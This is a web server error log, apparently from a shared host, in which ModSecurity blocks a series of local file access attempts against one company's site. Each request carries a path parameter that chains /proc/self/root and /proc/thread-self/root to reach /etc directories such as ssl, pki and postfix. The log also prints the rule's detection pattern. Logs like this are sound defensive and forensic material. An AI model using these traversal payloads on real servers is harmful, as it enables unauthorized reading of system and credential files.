[Mon Mar 16 18:52:22.733979 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.241.46:56668] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7ltSswJuvopo3lOiBuAAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:25.654076 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:56680] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7mbABkC4fWIHEf8EZrAAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:27.115888 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.241.46:56692] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7m_9ocpUE4ed4uDwVFwAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:29.931047 2026] [:error] [pid 15568:tid 140411658000128] [client 74.7.241.46:34134] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7naQpVkWug9HeOt9VGAAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:31.231067 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.241.46:34144] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7n_9ocpUE4ed4uDwVGQAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:32.613810 2026] [:error] [pid 15568:tid 140411607643904] [client 74.7.241.46:34152] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7oKQpVkWug9HeOt9VGQAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:33.950241 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.241.46:34168] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7obABkC4fWIHEf8EZrQAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:36.558492 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.241.46:34180] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7pKTCbgAP5jq5TehMkgAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:37.888847 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.241.46:34182] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7pf9ocpUE4ed4uDwVHQAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:39.200596 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.241.46:41544] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7p46lpbStxTqkSkuJ4AAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:40.583681 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.241.46:41550] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7qNSswJuvopo3lOiBuwAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:41.923075 2026] [:error] [pid 15568:tid 140411666392832] [client 74.7.241.46:41562] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7qaQpVkWug9HeOt9VGgAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:43.241802 2026] [:error] [pid 15568:tid 140411649607424] [client 74.7.241.46:41578] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7q6QpVkWug9HeOt9VHAAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:44.516859 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.241.46:41588] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7rI6lpbStxTqkSkuJ5AAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:45.167830 2026] [:error] [pid 15061:tid 140411691570944] [client 74.7.243.203:51744] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7raTCbgAP5jq5TehMmgAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:52:45.861306 2026] [:error] [pid 29802:tid 140411641214720] [client 74.7.241.46:41604] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7rc_BxrYCr4hPDw8L1gAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:47.239274 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.241.46:41608] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7r_9ocpUE4ed4uDwVHwAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:48.577564 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.241.46:53102] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7sFajLEzk2WiQ-100GAAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:50.023555 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.241.46:53114] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7sv9ocpUE4ed4uDwVIAAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:52.421526 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.241.46:53118] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7tI6lpbStxTqkSkuJ6QAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:53.790776 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.241.46:53128] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7tf9ocpUE4ed4uDwVIQAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:55.175340 2026] [:error] [pid 15568:tid 140411741927168] [client 74.7.241.46:53138] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7t6QpVkWug9HeOt9VIAAAA0A"], referer: 